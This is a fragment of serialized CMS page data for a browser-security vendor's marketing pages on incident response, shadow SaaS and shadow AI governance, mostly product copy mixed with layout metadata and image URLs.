image":354324,"reverse":6},"\u003Ch2>See attacks unfold, not just their aftermath\u003C/h2>","\u003Cp>Attacks happen in the browser, not in logs. Push captures what traditional tools miss: what users clicked, what loaded, what was entered, and how attackers moved. That gives you real-world evidence, not just assumptions, when every second matters.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F36fc719bd1de4a38b916f4d25c81a26d",{"large":354326},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":354328,"meta":354329,"component":354330,"responsiveStyles":354335},"builder-370e53c6016e432db01e9193a2ce90f6",{"previousId":354088},{"name":353724,"options":354331,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":353726,"title":354332,"description":354333,"reverse":41,"image":354334},"\u003Ch2>Investigate faster with high-fidelity data\u003C/h2>","\u003Cp>Reconstructing an incident shouldn’t feel like guesswork. Push records detailed telemetry from inside the browser: page loads, credential inputs, DOM changes, session activity, user behavior. It’s structured, exportable, and ready to plug into your investigation workflows, so you can move fast without digging through proxy logs or relying on user reports.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fa6adda040e684e67a8d68a55c5ce5f6d",{"large":354336},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":353732,"paddingTop":353734,"marginTop":353734},{"@type":106,"@version":107,"id":354338,"meta":354339,"component":354340,"responsiveStyles":354345},"builder-a7f3767a8d184bd08fb24520bf210e95",{"previousId":354098},{"name":353724,"options":354341,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":353739,"title":354342,"description":354343,"reverse":6,"image":354344},"\u003Ch2>Contain and respond in real time\u003C/h2>","\u003Cp>When something looks off, Push doesn’t just alert you, it gives you options. Guide users with in-browser prompts. Terminate sessions. Trigger SOAR workflows. Enrich SIEM alerts. Push gives you the context and control to stop spread before it starts.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb3dedeed5aba4847a2c2d22e10d0ec12",{"large":354346},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":353745},{"@type":106,"@version":107,"layerName":353724,"id":354348,"meta":354349,"component":354350,"responsiveStyles":354355},"builder-b92036ee0ece4b32acdbdcc7c377366b",{"previousId":354108},{"name":353724,"options":354351,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":280234,"title":354352,"description":354353,"reverse":41,"image":354354},"\u003Ch2>Prevent the next one\u003C/h2>","\u003Cp>Push helps you respond fast, but it also helps you fix what went wrong. It surfaces misconfigurations and risky behaviors that made the attack possible in the first place, then guides users in-browser to remediate. One tool. Full loop. No loose ends.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fc1ecc2d5d3814b62b072fac01827ff96",{"large":354356},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":353755},{"@type":106,"@version":107,"id":354358,"meta":354359,"component":354360,"responsiveStyles":354362},"builder-5e8ae39655274de89da32ab573a2525a",{"previousId":354118},{"name":353707,"options":354361,"isRSC":118},{"darkMode":6},{"large":354363},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":354365,"component":354366,"responsiveStyles":354368},"builder-dfd6850cfb4741d2b8a0c16c2780f00a",{"name":353765,"tag":353765,"options":354367,"isRSC":118},{"sectionHeading":37,"customClass":353767},{"large":354369},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":354371,"@type":106,"tagName":131,"properties":354372,"responsiveStyles":354373},"builder-pixel-t20dmmgkd7",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":354374},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":354376},{"path":37,"query":354377},{},{},1770892908052,1745427419274,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb07017bfd318431690a5bb35bda35b99",[],{"kind":353787,"breakpoints":354384,"originalContentId":354030,"winningTest":118,"lastPreviewUrl":354385,"hasLinks":6,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},"https://pushsecurity.com/uc/incident-response?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=a9d5556e77f84a37b5bd52310a7110c1&builder.overrides.a9d5556e77f84a37b5bd52310a7110c1=a9d5556e77f84a37b5bd52310a7110c1&builder.overrides.use-case-page:/uc/incident-response=a9d5556e77f84a37b5bd52310a7110c1&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"createdDate":354387,"id":354388,"name":281912,"modelId":353615,"published":13,"query":354389,"data":354392,"variations":354497,"lastUpdated":354498,"firstPublished":354499,"testRatio":33,"screenshot":354500,"createdBy":34,"lastUpdatedBy":354023,"folders":354501,"meta":354502,"rev":353789},1746122471259,"5f118e24433d46ceb79f5099987156d7",[354390],{"@type":353618,"property":353619,"operator":353620,"value":354391},"/uc/shadow-saas",{"seoTitle":354393,"seoDescription":354394,"customFonts":354395,"fontAwesomeIcon":354400,"title":354401,"jsCode":37,"tsCode":37,"blocks":354402,"url":354391,"state":354494},"Find and secure shadow SaaS","See and control shadow SaaS in the browser.",[354396],{"kind":353627,"variants":354397,"files":354398,"family":353626,"version":353628,"subsets":354399,"lastModified":353629,"category":353649,"menu":353650},[353655,353656,353657,353658,353659,353660,128,353661,353662,353663,353664,353665,1646,353666,353667,353668,353669,353670],{"100":353631,"200":353632,"300":353633,"500":353634,"600":353635,"700":353636,"800":353637,"900":353638,"300italic":353647,"500italic":353646,"regular":353644,"900italic":353640,"italic":353643,"100italic":353642,"200italic":353645,"600italic":353648,"700italic":353641,"800italic":353639},[353652,353653],"faShieldCheck","Secure shadow SaaS",[354403,354489],{"@type":106,"@version":107,"tagName":353676,"id":354404,"meta":354405,"children":354406},"builder-04da805c4cd34652a2db452fcda52e1d",{"previousId":354284},[354407,354423,354430,354437,354446,354456,354466,354476,354483],{"@type":106,"@version":107,"id":354408,"meta":354409,"component":354410,"responsiveStyles":354421},"builder-830d414faeaf41439142f9157e8288c8",{"previousId":354288},{"name":353680,"options":354411,"isRSC":118},{"title":354393,"description":354412,"points":354413,"video":354420},"\u003Cp>SaaS sprawl is one of today’s fastest-growing security blind spots because most tools monitor around the edges. Push sees it at the source, in the browser, revealing every app users access, flagging risky tools, and helping you shut down exposure before it leads to a breach. No guesswork. No nasty surprises. Just real-time visibility and control.\u003C/p>",[354414,354416,354418],{"item":354415},"Discover every SaaS app users access, managed or not",{"item":354417},"Spot accounts with weak security postures like missing MFA, unmanaged access, and no SSO",{"item":354419},"Control usage with in-browser prompts, blocks, and security guardrails","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F3e4eece318d04d6586e691d59d0741cf%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=3e4eece318d04d6586e691d59d0741cf&alt=media&optimized=true",{"large":354422},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":353695},{"@type":106,"@version":107,"id":354424,"meta":354425,"component":354426,"responsiveStyles":354428},"builder-cd7833f966cb4c7e8adf0d6c979414a6",{"previousId":354305},{"name":353699,"options":354427,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":354429},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":353703},{"@type":106,"@version":107,"id":354431,"meta":354432,"component":354433,"responsiveStyles":354435},"builder-49d720b45430454e8b08c526f267c19f",{"previousId":354312},{"name":353707,"options":354434,"isRSC":118},{"darkMode":41},{"large":354436},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":354438,"component":354439,"responsiveStyles":354444},"builder-3dde0bf6c8544e5e9ab41b18a9d68034",{"name":353712,"tag":353712,"options":354440,"isRSC":118},{"darkMode":6,"maxWidth":11942,"maxTextWidth":273005,"title":354441,"description":354442,"image":354443,"reverse":6},"\u003Ch2>Use your browser to curb Saas Sprawl\u003C/h2>","\u003Cp>Shadow SaaS isn’t hiding in your network, it’s in your browser. From AI tools to unsanctioned file-sharing sites, security risks live in the apps your users sign into every day. Push maps your organization's true SaaS footprint in real time, exposing apps and accounts with unmanaged access, poor authentication, or no security oversight.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb6811a214c7949b6bbe0b9a3bca62efd",{"large":354445},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":354447,"meta":354448,"component":354449,"responsiveStyles":354454},"builder-e2420451ccdc4f088d0a4904cff45935",{"previousId":354328},{"name":353724,"options":354450,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":353726,"title":354451,"description":354452,"reverse":41,"image":354453},"\u003Ch2>Discover hidden SaaS usage\u003C/h2>","\u003Cp>Push captures live browser telemetry across every tab and session. Whether a user signs into a sanctioned app with a personal account or tries a new AI plugin, you’ll see it in real time, with no integrations or manual tagging.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe16e301f9af94665b95d98232a863d8a",{"large":354455},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":353732,"paddingTop":353734,"marginTop":353734},{"@type":106,"@version":107,"id":354457,"meta":354458,"component":354459,"responsiveStyles":354464},"builder-b36de7fce7994beea9e58d94662e7166",{"previousId":354338},{"name":353724,"options":354460,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":353739,"title":354461,"description":354462,"reverse":6,"image":354463},"\u003Ch2>Spot risky access and unsafe usage\u003C/h2>","\u003Cp>Discovery is just the beginning. Push flags apps with risky traits, no MFA, no SSO, known vulnerabilities, or broad access scopes. You’ll know which tools introduce real risk, and which users are exposed so you can act with precision.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6585f3c242da4d70ae3cb7d02f481bef",{"large":354465},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":353745},{"@type":106,"@version":107,"layerName":353724,"id":354467,"meta":354468,"component":354469,"responsiveStyles":354474},"builder-dc366b5134684fe7a508edf8913103ea",{"previousId":354348},{"name":353724,"options":354470,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":280234,"title":354471,"description":354472,"reverse":41,"image":354473},"\u003Ch2>Close gaps before they grow\u003C/h2>","\u003Cp>Push turns insight into action. When risky SaaS use is detected, guide users to enable MFA, block high-risk apps, or apply in-browser guardrails automatically. All without deploying new infrastructure or managing dozens of integrations.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe6d60b6d91414819bc6258a318f00557",{"large":354475},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":353755},{"@type":106,"@version":107,"id":354477,"meta":354478,"component":354479,"responsiveStyles":354481},"builder-8708f6f0d8da4b3f9e17bf16cda70219",{"previousId":354358},{"name":353707,"options":354480,"isRSC":118},{"darkMode":6},{"large":354482},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":354484,"component":354485,"responsiveStyles":354487},"builder-8ff4b38d60534cf28cb523ab0f754875",{"name":353765,"tag":353765,"options":354486,"isRSC":118},{"sectionHeading":37,"customClass":353767},{"large":354488},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":354490,"@type":106,"tagName":131,"properties":354491,"responsiveStyles":354492},"builder-pixel-225hg4jfk9t",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":354493},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":354495},{"path":37,"query":354496},{},{},1770892936802,1746714967208,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F01bfb2304521412fbd2e1a1180904d40",[],{"originalContentId":354268,"winningTest":118,"lastPreviewUrl":354503,"breakpoints":354504,"kind":353787,"hasLinks":6,"hasAutosaves":6},"https://pushsecurity.com/uc/shadow-saas?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=5f118e24433d46ceb79f5099987156d7&builder.overrides.5f118e24433d46ceb79f5099987156d7=5f118e24433d46ceb79f5099987156d7&builder.overrides.use-case-page:/uc/shadow-saas=5f118e24433d46ceb79f5099987156d7&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":39,"medium":40},{"createdDate":354506,"id":354507,"name":354508,"modelId":353615,"published":13,"query":354509,"data":354512,"variations":354616,"lastUpdated":354617,"firstPublished":354618,"testRatio":33,"screenshot":354619,"createdBy":34,"lastUpdatedBy":354023,"folders":354620,"meta":354621,"rev":353789},1764707470172,"b62629ce2f3741158d961cd10fe74b31","Shadow AI",[354510],{"@type":353618,"property":353619,"operator":353620,"value":354511},"/uc/shadow-ai",{"fontAwesomeIcon":354513,"seoTitle":354514,"jsCode":37,"customFonts":354515,"title":354520,"tsCode":37,"seoDescription":354521,"blocks":354522,"url":354511,"state":354613},"faBrainCircuit","Secure AI native and AI enhanced apps. ",[354516],{"variants":354517,"category":353649,"files":354518,"subsets":354519,"family":353626,"kind":353627,"menu":353650,"lastModified":353629,"version":353628},[353655,353656,353657,353658,353659,353660,128,353661,353662,353663,353664,353665,1646,353666,353667,353668,353669,353670],{"100":353631,"200":353632,"300":353633,"500":353634,"600":353635,"700":353636,"800":353637,"900":353638,"800italic":353639,"regular":353644,"700italic":353641,"200italic":353645,"italic":353643,"500italic":353646,"600italic":353648,"300italic":353647,"100italic":353642,"900italic":353640},[353652,353653],"Secure shadow AI","See and control shadow AI apps in the browser.",[354523,354608],{"@type":106,"@version":107,"tagName":353676,"id":354524,"meta":354525,"children":354526},"builder-a6e5717a2c914d5695058e4ee201a05d",{"previousId":354404},[354527,354543,354550,354557,354567,354576,354585,354595,354602],{"@type":106,"@version":107,"id":354528,"meta":354529,"component":354530,"responsiveStyles":354541},"builder-3e0ed678683f4a0eb7aa00253cf263b2",{"previousId":354408},{"name":353680,"options":354531,"isRSC":118},{"title":354520,"description":354532,"points":354533,"image":354540},"\u003Cp>Your employees are adopting AI faster than you can track it. From native features in corporate apps to unapproved shadow tools, it’s all happening in the browser. Push detects every AI interaction in real time, letting you categorize apps and enforce acceptable use policies in the browser.\u003C/p>",[354534,354536,354538],{"item":354535},"Map every AI tool used across your workforce",{"item":354537},"Review and classify apps by sensitivity, purpose, and policy status",{"item":354539},"Enforce AI usage rules directly in the browser","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F33cf153d920f4e389f3650253577cff7",{"large":354542},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":353695},{"@type":106,"@version":107,"id":354544,"meta":354545,"component":354546,"responsiveStyles":354548},"builder-76968f8471d14893b8189d75b08fb426",{"previousId":354424},{"name":353699,"options":354547,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":354549},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":353703},{"@type":106,"@version":107,"id":354551,"meta":354552,"component":354553,"responsiveStyles":354555},"builder-b55b9d4bc5a649d8839ce7f6c2043d95",{"previousId":354431},{"name":353707,"options":354554,"isRSC":118},{"darkMode":41},{"large":354556},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":354558,"meta":354559,"component":354560,"responsiveStyles":354565},"builder-c3f38ef4d75d4989a29b5903175ed8a1",{"previousId":354438},{"name":353712,"tag":353712,"options":354561,"isRSC":118},{"darkMode":6,"maxWidth":11942,"maxTextWidth":273005,"title":354562,"description":354563,"image":354564,"reverse":6},"\u003Ch2>Use your browser to govern AI \u003C/h2>","\u003Cp>The AI footprint inside your company is bigger than you think. From text generators to meeting assistants and design copilots, employees test, adopt, and connect new tools constantly. Push shows you those tools and which users are accessing them, without relying on network scans or API integrations.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F30b43bda6f1644c19478fb1efa20050c",{"large":354566},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":354568,"meta":354569,"component":354570,"responsiveStyles":354574},"builder-90ee9cb9afc44e7f885523715bf51a53",{"previousId":354447},{"name":353724,"options":354571,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":353726,"title":354572,"description":354573,"reverse":41,"image":354463},"\u003Ch2>Discover every AI tool users touch\u003C/h2>","\u003Cp>Push captures live telemetry from the browser, identifying every AI-native and AI-enhanced application users access. You’ll know which corporate identities are connected, how data flows, and what new AI apps appear across your environment. \u003C/p>",{"large":354575},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":353732,"paddingTop":353734,"marginTop":353734},{"@type":106,"@version":107,"id":354577,"meta":354578,"component":354579,"responsiveStyles":354583},"builder-9e44539fa53c4d8e87406036c921fc46",{"previousId":354457},{"name":353724,"options":354580,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":353739,"title":354581,"description":354582,"reverse":6,"image":354473},"\u003Ch2>Classify and manage AI risk\u003C/h2>","\u003Cp>For apps you choose to allow, Push lets you apply custom in-browser banners. You can bulk-select categories of AI tools and require users to read and acknowledge your acceptable use policy before they proceed. This creates an auditable trail and moves policy from an easy to forget document to an active, in-workflow control.\u003C/p>",{"large":354584},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":353745},{"@type":106,"@version":107,"layerName":353724,"id":354586,"meta":354587,"component":354588,"responsiveStyles":354593},"builder-44c1a891926f4bdeaaa37e90721fe6ac",{"previousId":354467},{"name":353724,"options":354589,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":280234,"title":354590,"description":354591,"reverse":41,"image":354592},"\u003Ch2>Enforce your AI policy in the browser\u003C/h2>","\u003Cp>When an AI tool is deemed non-compliant or too risky, Push blocks it at the source. The block happens directly in the browser, preventing the user from accessing the site or submitting data. This gives you an immediate, powerful lever to stop data exfiltration and enforce a hard line on unacceptable risk.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fa359ac1805af4e15a8a7f84632b9bb55",{"large":354594},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":353755},{"@type":106,"@version":107,"id":354596,"meta":354597,"component":354598,"responsiveStyles":354600},"builder-dcc906f9cbe54dc68b3c672668e7a38f",{"previousId":354477},{"name":353707,"options":354599,"isRSC":118},{"darkMode":6},{"large":354601},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":354603,"component":354604,"responsiveStyles":354606},"builder-d2d64780c31b4349bc75805b23a07e38",{"name":353765,"tag":353765,"options":354605,"isRSC":118},{"sectionHeading":37,"customClass":353767},{"large":354607},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":354609,"@type":106,"tagName":131,"properties":354610,"responsiveStyles":354611},"builder-pixel-gvb5hb3oa9q",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":354612},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":354614},{"path":37,"query":354615},{},{},1770892957225,1764950077593,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe558b8b069884037a8e6904f7ecc029c",[],{"winningTest":118,"breakpoints":354622,"originalContentId":354388,"kind":353787,"lastPreviewUrl":354623,"hasLinks":6,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},"https://pushsecurity.com/uc/shadow-ai?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=b62629ce2f3741158d961cd10fe74b31&builder.overrides.b62629ce2f3741158d961cd10fe74b31=b62629ce2f3741158d961cd10fe74b31&builder.overrides.use-case-page:/uc/shadow-ai=b62629ce2f3741158d961cd10fe74b31&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",1776343281338]